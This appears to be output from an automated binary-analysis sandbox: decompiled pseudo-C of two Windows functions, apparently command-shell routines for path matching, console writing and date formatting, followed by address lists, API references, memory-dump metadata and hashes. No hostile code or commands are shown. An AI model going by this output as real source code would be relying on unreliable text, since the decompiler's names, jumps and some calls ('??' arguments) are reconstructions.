				char _v1093;
				signed int _v1094;
				signed int* _v1100;
				signed int _v1104;
				signed int* _v1108;
				intOrPtr _v1112;
				signed int _v1116;
				intOrPtr _v1120;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t106;
				intOrPtr _t123;
				intOrPtr _t127;
				intOrPtr _t132;
				intOrPtr _t133;
				intOrPtr _t135;
				void* _t136;
				signed int _t137;
				intOrPtr _t138;
				signed int _t143;
				signed int _t144;
				signed int _t145;
				intOrPtr* _t146;
				intOrPtr _t147;
				void* _t148;
				signed int _t153;
				signed int _t154;
				void* _t163;
				intOrPtr* _t164;
				intOrPtr* _t167;
				intOrPtr* _t170;
				signed int _t176;
				signed int* _t177;
				void* _t178;
				intOrPtr* _t186;
				void* _t190;
				signed int _t192;
				signed int _t196;
				void* _t198;
				intOrPtr* _t200;
				void* _t201;
				void* _t202;
				intOrPtr _t203;
				intOrPtr* _t204;
				signed int* _t205;
				signed int _t206;
				signed int _t211;

				_t191 = __edx;
				_t154 = _t211;
				_push(__ecx);
				_push(__ecx);
				_v8 =  *((intOrPtr*)(_t154 + 4));
				_t209 = (_t211 & 0xfffffff8) + 4;
				_t106 =  *0x2cd0b4; // 0x40f69e4c
				_v16 = _t106 ^ (_t211 & 0xfffffff8) + 0x00000004;
				_t200 =  *((intOrPtr*)(_t154 + 0xc));
				_t196 = 0;
				_v564 = 0x104;
				_v1093 = __edx;
				_v1116 = __ecx;
				 *0x2e3cf0 = 0;
				_v572 = 0;
				_v568 = 1;
				memset( &_v1092, 0, 0x104);
				_v36 = 0;
				_v32 = 1;
				_v28 = 0x104;
				memset( &_v556, 0, 0x104);
				_t156 =  &_v1092;
				if(E002B0C70( &_v1092, 0x7fe9) < 0) {
					L74:
					if(_v1093 == 0) {
						L14:
						_t196 = 1;
						L15:
						__imp__??_V@YAXPAX@Z(_v36);
						__imp__??_V@YAXPAX@Z(_v572);
						_pop(_t198);
						_pop(_t201);
						return E002B6FD0(_t196, _t154, _v16 ^ _t209, _t191, _t198, _t201);
					}
					_push(_t196);
					_push(0x2374);
					L13:
					E002AC5A2(_t156);
					goto L14;
				}
				_t156 =  &_v556;
				if(E002B0C70( &_v556, 0x7fe9) < 0) {
					goto L74;
				}
				_t163 = 0x30;
				_t164 = E002B00B0(_t163);
				_v1108 = _t164;
				if(_t164 == 0) {
					L47:
					E002C9287(_t164);
					__imp__longjmp(0x2db8b8, 1);
					L48:
					_t165 = 0x2e3ab0;
					L17:
					E002B0D89(_t191, _t165);
					E002B5D39();
					_t202 = _v572;
					_t167 = _t202;
					if(_t202 == 0) {
						_t167 =  &_v1092;
					}
					_t191 = _t167 + 2;
					do {
						_t123 =  *_t167;
						_t167 = _t167 + 2;
					} while (_t123 != _t196);
					_t156 = _t167 - _t191 >> 1;
					_v1104 = _t156;
					if(_t156 <= 3) {
						L24:
						if(_t156 + 1 > 0x7fe7) {
							if(_v1093 == 0) {
								goto L14;
							}
							_push(_t196);
							_push(2);
							goto L13;
						}
						_t203 = _v1120;
						_t125 =  *(_t203 + 0x10);
						if( *( *(_t203 + 0x10)) == _t196) {
							_t125 = "*";
						}
						E002B0D89(_t191, _t125);
						_t170 = _v36;
						if(_t170 == 0) {
							_t170 =  &_v556;
						}
						_t191 = _t170 + 2;
						do {
							_t127 =  *_t170;
							_t170 = _t170 + 2;
						} while (_t127 != _t196);
						_t156 = _t170 - _t191 >> 1;
						if(_v1104 + 1 + (_t170 - _t191 >> 1) > 0x7fe7) {
							if(_v1093 == 0) {
								goto L14;
							}
							_push(_t196);
							_push(0x6f);
							goto L13;
						}
						if( *( *(_t203 + 0x10)) == _t196) {
							L33:
							_t172 = _v36;
							if(_v36 == 0) {
								_t172 =  &_v556;
							}
							_t132 = E002B297B(_t172);
							_t204 = _v1100;
							 *_t204 = _t132;
							_t173 = _v572;
							if(_v572 == 0) {
								_t173 =  &_v1092;
							}
							_t133 = E002B297B(_t173);
							 *((intOrPtr*)(_t204 + 4)) = _t133;
							_t205 = _v1108;
							if(_t205[1] != _t196) {
								__imp___wcsicmp(_t205[1], _t133);
								if(_t133 == 0) {
									_t205[2] = _t205[2] + 1;
									_t176 = _v1100;
									goto L38;
								}
								_t164 = 0x30;
								_t205 = E002B00B0(_t164);
								if(_t205 == 0) {
									goto L47;
								}
								_v1108 = _t205;
								 *_v1108 = _t205;
								_t143 = E002B297B(_v1100[1]);
								_t176 = _v1100;
								_t205[1] = _t143;
								 *_t205 = _t196;
								_t144 =  *((intOrPtr*)(_t176 + 8));
								_t205[2] = 1;
								goto L37;
							} else {
								_t145 = E002B297B(_t133);
								_t176 = _v1100;
								_t205[1] = _t145;
								_t144 =  *((intOrPtr*)(_t176 + 8));
								L37:
								_t205[3] = _t176;
								_t205[4] = _t144;
								L38:
								_t191 = _v1116;
								_t135 = _v1112 + 1;
								_t177 =  *(_t176 + 0xc);
								_v1112 = _t135;
								_v1100 = _t177;
								if(_t135 >  *((intOrPtr*)(_v1116 + 0x48))) {
									goto L15;
								}
								L4:
								_t206 =  *_t177;
								_t192 = _t206;
								_v1104 = _t206;
								_t178 = _t192 + 2;
								do {
									_t136 =  *_t192;
									_t192 = _t192 + 2;
								} while (_t136 != _t196);
								_t191 = _t192 - _t178 >> 1;
								_t137 = E002B3121(_t206, _t192 - _t178 >> 1);
								_v1094 = _t137;
								if(_t137 != 0) {
									L8:
									_v1100[2] = _t137;
									if( *((char*)(_t154 + 8)) != 0) {
										_t191 = _t137;
										_t206 = E002B4DB8(_t206, _t137);
										E002B0040(_v1104);
									}
									_t156 = _t206;
									 *0x2e3cf0 = _t196;
									_t138 = E002B3B5D(_t206, _t191);
									_v1120 = _t138;
									if(_t138 != 1) {
										_t165 =  *0x2e3cb8;
										if( *0x2e3cb8 == 0) {
											goto L48;
										}
										goto L17;
									} else {
										if(_v1093 == 0) {
											goto L14;
										}
										_push(_t196);
										_push( *0x2e3cf0);
										goto L13;
									}
								}
								_t156 =  *0x2e3cf0;
								if(_t156 != 0) {
									if(_v1093 == 0) {
										goto L14;
									}
									_push(_t196);
									_push(_t156);
									goto L13;
								}
								goto L8;
							}
						}
						_t146 =  *((intOrPtr*)(_t203 + 0x14));
						if(_t146 == 0 ||  *_t146 == _t196) {
							_t186 = _v36;
							if(_t186 == 0) {
								_t186 =  &_v556;
							}
							_t191 = _t186 + 2;
							do {
								_t147 =  *_t186;
								_t186 = _t186 + 2;
							} while (_t147 != _t196);
							_t148 = (_t186 - _t191 >> 1) + 3;
							if(_v1094 != 0) {
								if(_t148 <= 0x7fe7 &&  *((char*)(_t154 + 8)) != 0) {
									E002B0CF2(_t191, L".*");
								}
							}
						}
						goto L33;
					}
					if(_v1094 != 0) {
						_t190 = _t202;
						if(_t202 == 0) {
							_t190 =  &_v1092;
						}
						if( *((short*)(E002A5846(_t190))) != 0x2e) {
							_t156 = _v1104;
							goto L22;
						} else {
							if(_t202 == 0) {
								_t202 =  &_v1092;
							}
							_t156 = _v1104;
							 *((short*)(_t202 + _t156 * 2 - 4)) = 0;
							goto L24;
						}
					}
					L22:
					if(_t202 == 0) {
						_t202 =  &_v1092;
					}
					 *((short*)(_t202 + _t156 * 2 - 2)) = 0;
					goto L24;
				}
				_t153 = _v1116;
				 *_t200 = _t164;
				_t191 = 1;
				 *_t164 = 0;
				 *((intOrPtr*)(_t164 + 4)) = 0;
				 *((intOrPtr*)(_t164 + 8)) = 1;
				_t177 = _t153 + 0x4c;
				_v1112 = 1;
				_v1100 = _t177;
				if( *((intOrPtr*)(_t153 + 0x48)) < 1) {
					goto L15;
				}
				goto L4;
			}





























































                                              0x002b4800
                                              0x002b4803
                                              0x002b4805
                                              0x002b4806
                                              0x002b4811
                                              0x002b4815
                                              0x002b481d
                                              0x002b4824
                                              0x002b4828
                                              0x002b4832
                                              0x002b4834
                                              0x002b4840
                                              0x002b4848
                                              0x002b484e
                                              0x002b4854
                                              0x002b485a
                                              0x002b4861
                                              0x002b4869
                                              0x002b4871
                                              0x002b4875
                                              0x002b4881
                                              0x002b4889
                                              0x002b489b
                                              0x002bea9e
                                              0x002beaa5
                                              0x002b498b
                                              0x002b498d
                                              0x002b498e
                                              0x002b4991
                                              0x002b499e
                                              0x002b49aa
                                              0x002b49ad
                                              0x002b49b9
                                              0x002b49b9
                                              0x002beaab
                                              0x002beaac
                                              0x002b4984
                                              0x002b4984
                                              0x00000000
                                              0x002b498a
                                              0x002b48a6
                                              0x002b48b3
                                              0x00000000
                                              0x00000000
                                              0x002b48bb
                                              0x002b48c1
                                              0x002b48c3
                                              0x002b48cb
                                              0x002be940
                                              0x002be940
                                              0x002be94c
                                              0x002be952
                                              0x002be952
                                              0x002b49ca
                                              0x002b49d1
                                              0x002b49d6
                                              0x002b49db
                                              0x002b49e1
                                              0x002b49e5
                                              0x002be95c
                                              0x002be95c
                                              0x002b49eb
                                              0x002b49ee
                                              0x002b49ee
                                              0x002b49f1
                                              0x002b49f4
                                              0x002b49fb
                                              0x002b49fd
                                              0x002b4a06
                                              0x002b4a24
                                              0x002b4a2c
                                              0x002bea90
                                              0x00000000
                                              0x00000000
                                              0x002bea96
                                              0x002bea97
                                              0x00000000
                                              0x002bea97
                                              0x002b4a32
                                              0x002b4a38
                                              0x002b4a3e
                                              0x002be9b0
                                              0x002be9b0
                                              0x002b4a4b
                                              0x002b4a50
                                              0x002b4a55
                                              0x002be9ba
                                              0x002be9ba
                                              0x002b4a5b
                                              0x002b4a5e
                                              0x002b4a5e
                                              0x002b4a61
                                              0x002b4a64
                                              0x002b4a71
                                              0x002b4a7b
                                              0x002bea7b
                                              0x00000000
                                              0x00000000
                                              0x002bea81
                                              0x002bea82
                                              0x00000000
                                              0x002bea82
                                              0x002b4a87
                                              0x002b4a9d
                                              0x002b4a9d
                                              0x002b4aa2
                                              0x002be9ef
                                              0x002be9ef
                                              0x002b4aa8
                                              0x002b4aad
                                              0x002b4ab3
                                              0x002b4ab5
                                              0x002b4abd
                                              0x002b4b53
                                              0x002b4b53
                                              0x002b4ac3
                                              0x002b4ac8
                                              0x002b4acb
                                              0x002b4ad4
                                              0x002be9fe
                                              0x002bea08
                                              0x002bea52
                                              0x002bea55
                                              0x00000000
                                              0x002bea55
                                              0x002bea0c
                                              0x002bea12
                                              0x002bea16
                                              0x00000000
                                              0x00000000
                                              0x002bea28
                                              0x002bea2e
                                              0x002bea33
                                              0x002bea38
                                              0x002bea3e
                                              0x002bea41
                                              0x002bea43
                                              0x002bea46
                                              0x00000000
                                              0x002b4ada
                                              0x002b4adc
                                              0x002b4ae1
                                              0x002b4ae7
                                              0x002b4aea
                                              0x002b4aed
                                              0x002b4aed
                                              0x002b4af0
                                              0x002b4af3
                                              0x002b4af9
                                              0x002b4aff
                                              0x002b4b00
                                              0x002b4b03
                                              0x002b4b09
                                              0x002b4b12
                                              0x00000000
                                              0x00000000
                                              0x002b48fc
                                              0x002b48fc
                                              0x002b48fe
                                              0x002b4900
                                              0x002b4906
                                              0x002b4909
                                              0x002b4909
                                              0x002b490c
                                              0x002b490f
                                              0x002b4918
                                              0x002b491a
                                              0x002b491f
                                              0x002b4927
                                              0x002b4937
                                              0x002b4941
                                              0x002b4944
                                              0x002b4946
                                              0x002b4955
                                              0x002b4957
                                              0x002b4957
                                              0x002b495c
                                              0x002b495e
                                              0x002b4964
                                              0x002b4969
                                              0x002b4972
                                              0x002b49bc
                                              0x002b49c4
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002b4974
                                              0x002b497b
                                              0x00000000
                                              0x00000000
                                              0x002b497d
                                              0x002b497e
                                              0x00000000
                                              0x002b497e
                                              0x002b4972
                                              0x002b4929
                                              0x002b4931
                                              0x002bea67
                                              0x00000000
                                              0x00000000
                                              0x002bea6d
                                              0x002bea6e
                                              0x00000000
                                              0x002bea6e
                                              0x00000000
                                              0x002b4931
                                              0x002b4ad4
                                              0x002b4a89
                                              0x002b4a8e
                                              0x002b4b1d
                                              0x002b4b22
                                              0x002b4b4b
                                              0x002b4b4b
                                              0x002b4b24
                                              0x002b4b27
                                              0x002b4b27
                                              0x002b4b2a
                                              0x002b4b2d
                                              0x002b4b3d
                                              0x002b4b40
                                              0x002be9ca
                                              0x002be9e5
                                              0x002be9e5
                                              0x002be9ca
                                              0x002b4b40
                                              0x00000000
                                              0x002b4a8e
                                              0x002b4a0f
                                              0x002be967
                                              0x002be96b
                                              0x002be96d
                                              0x002be96d
                                              0x002be97c
                                              0x002be99a
                                              0x00000000
                                              0x002be97e
                                              0x002be980
                                              0x002be982
                                              0x002be982
                                              0x002be988
                                              0x002be990
                                              0x00000000
                                              0x002be990
                                              0x002be97c
                                              0x002b4a15
                                              0x002b4a17
                                              0x002be9a5
                                              0x002be9a5
                                              0x002b4a1f
                                              0x00000000
                                              0x002b4a1f
                                              0x002b48d1
                                              0x002b48d9
                                              0x002b48db
                                              0x002b48dc
                                              0x002b48de
                                              0x002b48e1
                                              0x002b48e4
                                              0x002b48e7
                                              0x002b48ed
                                              0x002b48f6
                                              0x00000000
                                              0x00000000
                                              0x00000000

                                              APIs
                                              • memset.MSVCRT ref: 002B4861
                                              • memset.MSVCRT ref: 002B4881
                                                • Part of subcall function 002B0C70: ??_V@YAXPAX@Z.MSVCRT ref: 002B0CBA
                                                • Part of subcall function 002B0C70: memset.MSVCRT ref: 002B0CDD
                                                • Part of subcall function 002B00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,002ADF68,00000001,?,00000000,002B3458,-00000105,002CBDD8,00000240,002B4B82,00000000,00000000,002BAE6E,00000000), ref: 002B00C1
                                                • Part of subcall function 002B00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,002ADF68,00000001,?,00000000,002B3458,-00000105,002CBDD8,00000240,002B4B82,00000000,00000000,002BAE6E,00000000,?), ref: 002B00C8
                                              • ??_V@YAXPAX@Z.MSVCRT ref: 002B4991
                                              • ??_V@YAXPAX@Z.MSVCRT ref: 002B499E
                                              • longjmp.MSVCRT(002DB8B8,00000001,00007FE9,00007FE9,?,?,?,?,00000000,?), ref: 002BE94C
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: memset$Heap$AllocProcesslongjmp
                                              • String ID:
                                              • API String ID: 2656838167-0
                                              • Opcode ID: 9bcef7a24a3f017bd44aa0431c39ca2a96e8874840e7d47f67a9044d8355886a
                                              • Instruction ID: e85f5d661498401cac704e996dc987e596756f85c97f10196e825fd006a3d594
                                              • Opcode Fuzzy Hash: 9bcef7a24a3f017bd44aa0431c39ca2a96e8874840e7d47f67a9044d8355886a
                                              • Instruction Fuzzy Hash: B5D103709206258BCF38EF14C8D57EAB7B4AF44780F1440DDDA4AA7282DB70AEA5CF55
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002AB6CB, Relevance: 9.2, APIs: 6, Instructions: 155COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 62%
                                              			E002AB6CB(void** __ecx, intOrPtr _a8) {
				void _v8;
				intOrPtr _v12;
				void* _v16;
				char _v20;
				char _v76;
				short _v332;
				signed short _v342;
				signed short _v344;
				signed short _v346;
				struct _SYSTEMTIME _v348;
				int _v352;
				int _v356;
				intOrPtr _v360;
				intOrPtr _v364;
				void** _v368;
				struct _FILETIME _v376;
				struct _FILETIME _v384;
				void _v420;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t96;
				void* _t97;
				void* _t103;
				intOrPtr _t114;
				void* _t115;
				void** _t121;
				void** _t122;
				void* _t125;
				void* _t126;
				void* _t135;
				void* _t136;
				signed short _t143;
				long _t153;
				short* _t155;
				void* _t161;
				signed int _t164;
				void* _t168;
				void _t170;
				void _t174;
				intOrPtr _t184;
				void* _t187;
				void* _t192;
				void** _t193;
				signed int _t195;
				signed int _t204;
				int _t207;
				void** _t215;
				void** _t216;
				signed int _t224;
				signed int _t228;
				void* _t229;
				void* _t232;
				void* _t238;
				void* _t240;
				intOrPtr _t248;
				signed int _t253;
				void* _t258;
				void* _t259;
				void* _t260;
				void* _t263;
				void* _t264;
				signed int _t265;
				void* _t266;

				_t193 = __ecx;
				if( *(__ecx + 8) != 0) {
					_t97 = E002B269C(_t96);
					_t260 =  *(__ecx + 0x10);
					if(_t97 == 0) {
						if(E002B27C8( *(__ecx + 8) +  *(__ecx + 8), _t260,  *(__ecx + 8) +  *(__ecx + 8),  &_v20) == 0) {
							goto L59;
						} else {
							_t179 =  *(__ecx + 8);
							_t101 =  *(__ecx + 8) + _t179;
							if(_v20 >=  *(__ecx + 8) + _t179) {
								goto L35;
							} else {
								goto L59;
							}
						}
					} else {
						_t184 = _t260 +  *(__ecx + 8) * 2;
						_v12 = _t184;
						if(_t260 < _t184) {
							_t238 = 0x2022;
							while(1) {
								_t259 = _t260;
								if(_t260 >= _t184) {
									goto L35;
								}
								while( *_t259 != _t238) {
									_t259 = _t259 + 2;
									if(_t259 < _t184) {
										continue;
									}
									break;
								}
								if(_t259 == _t260) {
									goto L48;
								} else {
									_t192 = _t259 - _t260 >> 1;
									_v16 = _t192;
									__imp___get_osfhandle(0);
									if(WriteConsoleW(_t192, 1, _t260, _t192,  &_v8) == 0) {
										L59:
										_t202 = 1;
										if(E002B0178(_t101) == 0) {
											_t202 = 1;
											_t103 = E002C9953(_t102, 1);
											if(_t103 == 0) {
												_push(_t103);
												_push(0x70);
												goto L63;
											}
										} else {
											_push(0);
											_push(0x1d);
											L63:
											E002AC5A2(_t202);
											_pop(_t202);
										}
										E002C9287(_t202);
										__imp__longjmp(0x2db8b8, 1);
										asm("int3");
										_t204 = 9;
										memcpy( &_v420, _t260, _t204 << 2);
										_t266 = _t266 + 0xc;
										E002C3C49( &_v420,  &_v376);
										FileTimeToLocalFileTime( &_v376,  &_v384);
										FileTimeToSystemTime( &_v384,  &_v348);
										_v352 = 0;
										if( *0x2e3cc9 == 0) {
											_t245 = _v348 & 0x0000ffff;
											_t261 = _v346 & 0x0000ffff;
											_t258 = _v342 & 0x0000ffff;
											_v352 = _t245;
											if(_v364 == 0) {
												_t224 = 0x64;
												_t245 = _t245 % _t224;
												_v352 = _t245;
											}
											_t114 =  *0x2cd540; // 0x0
											if(_t114 != 2) {
												if(_t114 == 1) {
													_t135 = _t261;
													_t261 = _t258;
													_t258 = _t135;
												}
											} else {
												_t136 = _t245;
												_t245 = _t258;
												_t258 = _t261;
												_v352 = _t245;
												_t261 = _t136;
											}
											_t207 =  *0x2cd598; // 0x0
											if(_t207 >= 0x20) {
												_t115 =  *0x2cd594; // 0x0
												goto L92;
											} else {
												_t115 = realloc( *0x2cd594, 0x40);
												_pop(0);
												if(_t115 != 0) {
													_t245 = _v352;
													_t207 = 0x20;
													 *0x2cd594 = _t115;
													 *0x2cd598 = _t207;
													L92:
													_push(_t245);
													_push(0x2cf80c);
													_push(_t258);
													_push(0x2cf80c);
													E002B274C(_t115, _t207, L"%02d%s%02d%s%02d", _t261);
													_t266 = _t266 + 0x20;
													_t258 = 2;
													goto L34;
												} else {
													_push(_t115);
													goto L79;
												}
											}
										} else {
											_v356 = 0;
											if(GetLocaleInfoW(E002B41A4(), 0x1f,  &_v332, 0x80) == 0) {
												_t245 = 0x80;
												E002B1040( &_v332, 0x80,  *0x2cf7f8);
											}
											_t143 = _v332;
											_t263 =  &_v332;
											_t258 = 2;
											if(_t143 != 0) {
												_t195 = _v356;
												_t228 = _t143 & 0x0000ffff;
												_t161 = 0x64;
												do {
													if(_t228 == 0x27) {
														_t263 = _t263 + _t258;
														_t195 = 0 | _t195 == 0x00000000;
													} else {
														if(_t195 != 0 || _t228 != _t161 && _t228 != 0x4d) {
															_t263 = _t263 + _t258;
														} else {
															_t253 = 0;
															do {
																_t263 = _t263 + _t258;
																_t253 = 1 + _t253;
															} while ( *_t263 == _t228);
															_v356 = _t263;
															_t264 = _t263 +  ~_t253 * 2;
															if(_t253 != 1) {
																_t168 = 0x64;
																if(_t228 == _t168) {
																	_v360 = 0;
																}
																if(_t253 <= 3) {
																	_t263 = _v356;
																} else {
																	_t245 = _v356;
																	_t229 = _t245;
																	_v356 = _t229 + 2;
																	do {
																		_t170 =  *_t229;
																		_t229 = _t229 + _t258;
																	} while (_t170 != _v352);
																	_t263 = _t264 + 6;
																	memmove(_t263, _t245, 2 + (_t229 - _v356 >> 1) * 2);
																	_t266 = _t266 + 0xc;
																}
															} else {
																_t232 = _t264;
																_t245 = _t232 + 2;
																do {
																	_t174 =  *_t232;
																	_t232 = _t232 + _t258;
																} while (_t174 != _v352);
																memmove(_t264 + 2, _t264, 2 + (_t232 - _t245 >> 1) * 2);
																_t266 = _t266 + 0xc;
																_t263 = _t264 + 4;
															}
														}
													}
													_t164 =  *_t263 & 0x0000ffff;
													_t228 = _t164;
													_t161 = 0x64;
												} while (_t164 != 0);
												_t193 = _v368;
											}
											if(GetDateFormatW(E002B41A4(), 0,  &_v348,  &_v332,  *0x2cd594,  *0x2cd598) == 0) {
												L31:
												_t261 = GetDateFormatW(E002B41A4(), 0,  &_v348,  &_v332, 0, 0);
												if(_t261 == 0) {
													_t153 = GetLastError();
													_push(0);
													goto L77;
												} else {
													_t261 = _t261 + 1;
													_t155 = realloc( *0x2cd594, _t261 + _t261);
													_pop(0);
													if(_t155 == 0) {
														_push(0);
														L79:
														_push(8);
														goto L80;
													} else {
														 *0x2cd594 = _t155;
														 *0x2cd598 = _t261;
														_t261 = 0;
														if(GetDateFormatW(E002B41A4(), 0,  &_v348,  &_v332, _t155, 0) == 0) {
															_t153 = GetLastError();
															_push(0);
															L77:
															 *0x2e3cf0 = _t153;
															_push(_t153);
															L80:
															E002AC5A2(0);
															_t122 = 0;
														} else {
															L34:
															_t261 =  *0x2cd594; // 0x0
															goto L14;
														}
													}
												}
											} else {
												_t261 =  *0x2cd594; // 0x0
												if(_t261 == 0) {
													goto L31;
												} else {
													L14:
													_push(E002A5AA7(_v344 & 0x0000ffff));
													_t245 = 0x20;
													E002B1040( &_v76, _t245);
													if(_t193 == 0) {
														if(_v360 != 0) {
															if(E002A68B5() == 0) {
																_push(_t261);
																_push( &_v76);
															} else {
																_push( &_v76);
																_push(_t261);
															}
															_t121 = E002B25D9(L"%s %s ");
														} else {
															_push(_t261);
															_t121 = E002B25D9(L"%s ");
														}
														_t193 = _t121;
													} else {
														if(_v360 == 0 || _v364 != 1) {
															E002B1040(_t193, _a8, _t261);
														} else {
															_t126 = E002A68B5();
															_t248 = _a8;
															_t216 = _t193;
															if(_t126 != 0) {
																E002B1040(_t216, _t248, _t261);
																E002B18C0(_t193, _a8, " ");
																_push( &_v76);
															} else {
																E002B1040(_t216, _t248,  &_v76);
																E002B18C0(_t193, _a8, " ");
																_push(_t261);
															}
															E002B18C0(_t193, _a8);
														}
														_t215 =  &(_t193[0]);
														_t245 = 0;
														do {
															_t125 =  *_t193;
															_t193 = _t193 + _t258;
														} while (_t125 != 0);
														_t193 = _t193 - _t215 >> 1;
													}
													_t122 = _t193;
												}
											}
										}
										return E002B6FD0(_t122, _t193, _v8 ^ _t265, _t245, _t258, _t261);
									} else {
										_t101 = _v16;
										if(_v8 != _v16) {
											goto L59;
										} else {
											_t184 = _v12;
											_t260 = _t259;
											_t238 = 0x2022;
											L48:
											while(_t259 < _t184) {
												if( *_t259 == _t238) {
													_t259 = _t259 + 2;
													continue;
												}
												break;
											}
											if(_t259 == _t260) {
												L55:
												_t238 = 0x2022;
												if(_t260 < _t184) {
													continue;
												} else {
													goto L35;
												}
											} else {
												if( *_t193 != 0) {
													SetConsoleMode( *_t193, 2);
												}
												_t187 = _t259 - _t260 >> 1;
												_v16 = _t187;
												__imp___get_osfhandle(_t260, _t187,  &_v8, 0);
												_t240 = 1;
												_t260 = WriteConsoleW(_t187, ??, ??, ??, ??);
												_t101 = E002B06C0(_t240);
												if(_t260 == 0) {
													goto L59;
												} else {
													_t101 = _v16;
													if(_v8 != _v16) {
														goto L59;
													} else {
														_t184 = _v12;
														_t260 = _t259;
														goto L55;
													}
												}
											}
										}
									}
								}
								goto L102;
							}
						}
						goto L35;
					}
				} else {
					L35:
					_t193[1] = _t193[1] + E002ABED7(_t193, _t193[4]);
					 *(_t193[4]) = 0;
					_t193[2] = _t193[2] & 0;
					return 0;
				}
				L102:
			}



































































                                              0x002ab6d4
                                              0x002ab6dc
                                              0x002b9996
                                              0x002b999b
                                              0x002b99a0
                                              0x002b9a97
                                              0x00000000
                                              0x002b9a99
                                              0x002b9a99
                                              0x002b9a9c
                                              0x002b9aa1
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002b9aa1
                                              0x002b99a6
                                              0x002b99a9
                                              0x002b99ac
                                              0x002b99b1
                                              0x002b99b7
                                              0x002b99bc
                                              0x002b99bc
                                              0x002b99c0
                                              0x00000000
                                              0x00000000
                                              0x002b99c6
                                              0x002b99cb
                                              0x002b99d0
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002b99d0
                                              0x002b99d4
                                              0x00000000
                                              0x002b99d6
                                              0x002b99e0
                                              0x002b99e6
                                              0x002b99e9
                                              0x002b99f9
                                              0x002b9aa7
                                              0x002b9aa9
                                              0x002b9ab1
                                              0x002b9abb
                                              0x002b9abc
                                              0x002b9ac3
                                              0x002b9ac5
                                              0x002b9ac6
                                              0x00000000
                                              0x002b9ac6
                                              0x002b9ab3
                                              0x002b9ab3
                                              0x002b9ab5
                                              0x002b9ac8
                                              0x002b9ac8
                                              0x002b9ace
                                              0x002b9ace
                                              0x002b9acf
                                              0x002b9adb
                                              0x002b9ae1
                                              0x002b9ae4
                                              0x002b9aeb
                                              0x002b9aeb
                                              0x002b9af9
                                              0x002a5b59
                                              0x002a5b6d
                                              0x002a5b75
                                              0x002a5b81
                                              0x002b9bba
                                              0x002b9bc1
                                              0x002b9bc8
                                              0x002b9bcf
                                              0x002b9bdb
                                              0x002b9be3
                                              0x002b9be4
                                              0x002b9be6
                                              0x002b9be6
                                              0x002b9bec
                                              0x002b9bf4
                                              0x002b9c09
                                              0x002b9c0b
                                              0x002b9c0d
                                              0x002b9c0f
                                              0x002b9c0f
                                              0x002b9bf6
                                              0x002b9bf6
                                              0x002b9bf8
                                              0x002b9bfa
                                              0x002b9bfc
                                              0x002b9c02
                                              0x002b9c02
                                              0x002b9c11
                                              0x002b9c1a
                                              0x002b9c4c
                                              0x00000000
                                              0x002b9c1c
                                              0x002b9c24
                                              0x002b9c2b
                                              0x002b9c2e
                                              0x002b9c36
                                              0x002b9c3e
                                              0x002b9c3f
                                              0x002b9c44
                                              0x002b9c51
                                              0x002b9c51
                                              0x002b9c57
                                              0x002b9c58
                                              0x002b9c59
                                              0x002b9c62
                                              0x002b9c67
                                              0x002b9c6c
                                              0x00000000
                                              0x002b9c30
                                              0x002b9c30
                                              0x00000000
                                              0x002b9c30
                                              0x002b9c2e
                                              0x002a5b87
                                              0x002a5b87
                                              0x002a5baa
                                              0x002b9b09
                                              0x002b9b11
                                              0x002b9b11
                                              0x002a5bb0
                                              0x002a5bb7
                                              0x002a5bbf
                                              0x002a5bc3
                                              0x002a5bc5
                                              0x002a5bcd
                                              0x002a5bd0
                                              0x002a5bd1
                                              0x002a5bd5
                                              0x002b9b1d
                                              0x002b9b24
                                              0x002a5bdb
                                              0x002a5bdd
                                              0x002a5bf2
                                              0x002a5cdd
                                              0x002a5cdf
                                              0x002a5ce1
                                              0x002a5ce1
                                              0x002a5ce3
                                              0x002a5ce4
                                              0x002a5ceb
                                              0x002a5cf3
                                              0x002a5cf9
                                              0x002b9b2d
                                              0x002b9b31
                                              0x002b9b35
                                              0x002b9b35
                                              0x002b9b3e
                                              0x002b9b82
                                              0x002b9b40
                                              0x002b9b40
                                              0x002b9b46
                                              0x002b9b4b
                                              0x002b9b51
                                              0x002b9b51
                                              0x002b9b54
                                              0x002b9b56
                                              0x002b9b65
                                              0x002b9b74
                                              0x002b9b7a
                                              0x002b9b7a
                                              0x002a5cff
                                              0x002a5cff
                                              0x002a5d01
                                              0x002a5d04
                                              0x002a5d04
                                              0x002a5d07
                                              0x002a5d09
                                              0x002a5d23
                                              0x002a5d29
                                              0x002a5d2c
                                              0x002a5d2c
                                              0x002a5cf9
                                              0x002a5bdd
                                              0x002a5bf4
                                              0x002a5bf9
                                              0x002a5bfe
                                              0x002a5bfe
                                              0x002a5c01
                                              0x002a5c01
                                              0x002a5c32
                                              0x002a5d34
                                              0x002a5d53
                                              0x002a5d57
                                              0x002b9b8d
                                              0x002b9b95
                                              0x00000000
                                              0x002a5d5d
                                              0x002a5d5d
                                              0x002a5d68
                                              0x002a5d6f
                                              0x002a5d72
                                              0x002b9ba9
                                              0x002b9baa
                                              0x002b9baa
                                              0x00000000
                                              0x002a5d78
                                              0x002a5d7a
                                              0x002a5d8c
                                              0x002a5d93
                                              0x002a5da4
                                              0x002b9b98
                                              0x002b9b9e
                                              0x002b9b9f
                                              0x002b9b9f
                                              0x002b9ba4
                                              0x002b9bac
                                              0x002b9bac
                                              0x002b9bb3
                                              0x002a5daa
                                              0x002a5daa
                                              0x002a5daa
                                              0x00000000
                                              0x002a5daa
                                              0x002a5da4
                                              0x002a5d72
                                              0x002a5c38
                                              0x002a5c38
                                              0x002a5c40
                                              0x00000000
                                              0x002a5c46
                                              0x002a5c46
                                              0x002a5c52
                                              0x002a5c55
                                              0x002a5c59
                                              0x002a5c60
                                              0x002b9c79
                                              0x002b9c94
                                              0x002b9c9a
                                              0x002b9c9b
                                              0x002b9c96
